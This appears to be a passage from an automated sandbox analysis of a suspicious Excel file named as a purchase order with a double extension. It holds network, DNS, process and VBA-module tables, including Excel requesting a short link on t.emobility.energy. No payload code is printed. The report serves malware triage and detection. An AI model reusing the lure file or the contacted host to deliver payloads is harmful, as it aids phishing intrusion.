                                    Mar 25, 2025 17:51:10.843717098 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.854444027 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.854444027 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.854465008 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.854578018 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:24.760730028 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.760795116 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:24.760869026 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.760935068 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.760983944 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:24.761128902 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.761284113 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.761300087 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:24.761528015 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:24.761550903 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.069134951 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.069225073 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.070225000 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.070297956 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.073126078 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.073137999 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.073260069 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.073271036 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.073441029 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.073549032 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.084428072 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.084455967 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.128262997 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.128278971 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.261396885 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.261604071 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.261764050 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.262283087 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.262305021 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.262315035 CET49731443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.262320995 CET4434973113.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.294441938 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.294460058 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.294512987 CET4434973013.107.246.40192.168.2.27
                                    Mar 25, 2025 17:51:25.294560909 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.294586897 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.294868946 CET49730443192.168.2.2713.107.246.40
                                    Mar 25, 2025 17:51:25.294889927 CET4434973013.107.246.40192.168.2.27
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 25, 2025 17:51:09.132519960 CET5973753192.168.2.271.1.1.1
                                    Mar 25, 2025 17:51:09.284486055 CET53597371.1.1.1192.168.2.27
                                    Mar 25, 2025 17:51:24.603542089 CET5973753192.168.2.271.1.1.1
                                    Mar 25, 2025 17:51:24.759725094 CET53597371.1.1.1192.168.2.27
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Mar 25, 2025 17:51:09.132519960 CET192.168.2.271.1.1.10x6df5Standard query (0)t.emobility.energyA (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.603542089 CET192.168.2.271.1.1.10xba2cStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Mar 25, 2025 17:50:22.220992088 CET1.1.1.1192.168.2.270x45aaNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:50:22.220992088 CET1.1.1.1192.168.2.270x45aaNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:50:22.220992088 CET1.1.1.1192.168.2.270x45aaNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:09.284486055 CET1.1.1.1192.168.2.270x6df5No error (0)t.emobility.energyhost1.emobility.energyCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:09.284486055 CET1.1.1.1192.168.2.270x6df5No error (0)host1.emobility.energy162.19.137.157A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.151A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.161A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.159A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.155A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.152A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.147A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.156A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.150A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:20.438862085 CET1.1.1.1192.168.2.270xbb69No error (0)a726.dscd.akamai.net23.44.136.157A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.759725094 CET1.1.1.1192.168.2.270xba2cNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.759725094 CET1.1.1.1192.168.2.270xba2cNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.759725094 CET1.1.1.1192.168.2.270xba2cNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.759725094 CET1.1.1.1192.168.2.270xba2cNo error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:24.759725094 CET1.1.1.1192.168.2.270xba2cNo error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.179A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.184A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.175A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.185A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.183A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.182A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.180A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.186A (IP address)IN (0x0001)false
                                    Mar 25, 2025 17:51:36.909840107 CET1.1.1.1192.168.2.270xe296No error (0)a726.dscd.akamai.net23.44.136.181A (IP address)IN (0x0001)false
                                    • t.emobility.energy
                                    • otelrules.svc.static.microsoft
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.2749723162.19.137.1574438128C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-25 16:51:09 UTC222OUTGET /kqQ8bI HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: t.emobility.energy
                                    Connection: Keep-Alive
                                    2025-03-25 16:51:10 UTC539INHTTP/1.1 301 Moved Permanently
                                    Date: Tue, 25 Mar 2025 16:51:09 GMT
                                    Server: Apache/2.4.62 (Debian)
                                    X-DNS-Prefetch-Control: off
                                    X-Frame-Options: SAMEORIGIN
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    Location: /404
                                    Vary: Accept
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 38
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                    Connection: close
                                    2025-03-25 16:51:10 UTC38INData Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 34 30 34
                                    Data Ascii: Moved Permanently. Redirecting to /404


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2749724162.19.137.1574438128C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-25 16:51:10 UTC219OUTGET /404 HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: t.emobility.energy
                                    Connection: Keep-Alive
                                    2025-03-25 16:51:10 UTC590INHTTP/1.1 404 Not Found
                                    Date: Tue, 25 Mar 2025 16:51:10 GMT
                                    Server: Apache/2.4.62 (Debian)
                                    X-DNS-Prefetch-Control: off
                                    X-Frame-Options: SAMEORIGIN
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-Powered-By: Next.js
                                    ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 4645
                                    Vary: Accept-Encoding
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                    Connection: close
                                    2025-03-25 16:51:10 UTC4645INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6e 64 65 66 69 6e 65 64 20 69 73 20 61 20 66 72 65 65 20 61 6e 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 55 52 4c 20 73 68 6f 72 74 65 6e 65 72 20 77 69 74 68 20 63 75 73 74 6f 6d 20 64 6f 6d 61 69 6e 73 20 61 6e
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"/><meta name="description" content="undefined is a free and open source URL shortener with custom domains an


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.274973113.107.246.404438128C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-25 16:51:25 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-25 16:51:25 UTC491INHTTP/1.1 200 OK
                                    Date: Tue, 25 Mar 2025 16:51:25 GMT
                                    Content-Type: text/xml
                                    Content-Length: 461
                                    Connection: close
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                                    ETag: "0x8DD04C77BDE7614"
                                    x-ms-request-id: 983e9fb2-c01e-002b-6ba5-9d6e00000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250325T165125Z-17cccd5449bcdqb4hC1EWRt7pn00000003ug00000000n65a
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    X-Cache-Info: L1_T2
                                    Accept-Ranges: bytes
                                    2025-03-25 16:51:25 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.274973013.107.246.404438128C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-25 16:51:25 UTC215OUTGET /rules/rule120201v19s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-25 16:51:25 UTC515INHTTP/1.1 200 OK
                                    Date: Tue, 25 Mar 2025 16:51:25 GMT
                                    Content-Type: text/xml
                                    Content-Length: 2781
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 31 Dec 2024 22:07:50 GMT
                                    ETag: "0x8DD29E791389B5C"
                                    x-ms-request-id: 756ff186-d01e-0014-74a5-9ded58000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250325T165125Z-17cccd5449bn9hh6hC1EWRzvfg0000000e6g00000000bzz1
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    X-Cache-Info: L1_T2
                                    Accept-Ranges: bytes
                                    2025-03-25 16:51:25 UTC2781INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 32 30 31 22 20 56 3d 22 31 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 73 61 67 65 2e 43 6c 69 63 6b 53 74 72 65 61 6d 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 55 73 61 67 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120201" V="19" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns=""> <RIS>


                                    Click to jump to process

                                    Click to jump to process

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Target ID:0
                                    Start time:12:50:14
                                    Start date:25/03/2025
                                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x7ff6879a0000
                                    File size:70'082'712 bytes
                                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Target ID:8
                                    Start time:12:50:31
                                    Start date:25/03/2025
                                    Path:C:\Windows\System32\appidpolicyconverter.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\appidpolicyconverter.exe"
                                    Imagebase:0x7ff7dd3c0000
                                    File size:155'648 bytes
                                    MD5 hash:6567D9CF2545FAAC60974D9D682700D4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:12:50:31
                                    Start date:25/03/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7639b0000
                                    File size:1'040'384 bytes
                                    MD5 hash:9698384842DA735D80D278A427A229AB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:14
                                    Start time:12:51:17
                                    Start date:25/03/2025
                                    Path:C:\Windows\splwow64.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\splwow64.exe 12288
                                    Imagebase:0x7ff679610000
                                    File size:192'512 bytes
                                    MD5 hash:4C1F48431A4C5DE7841216C32CD98C46
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Target ID:18
                                    Start time:12:51:31
                                    Start date:25/03/2025
                                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx"
                                    Imagebase:0x7ff6879a0000
                                    File size:70'082'712 bytes
                                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Call Graph

                                    Hide Legend
                                    • Entrypoint
                                    • Decryption Function
                                    • Executed
                                    • Not Executed
                                    • Show Help
                                    callgraph 1 Error: Graph is empty

                                    Module: Sheet1

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet1"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet2

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet2"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet3

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet3"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: ThisWorkbook

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "ThisWorkbook"

                                    2

                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True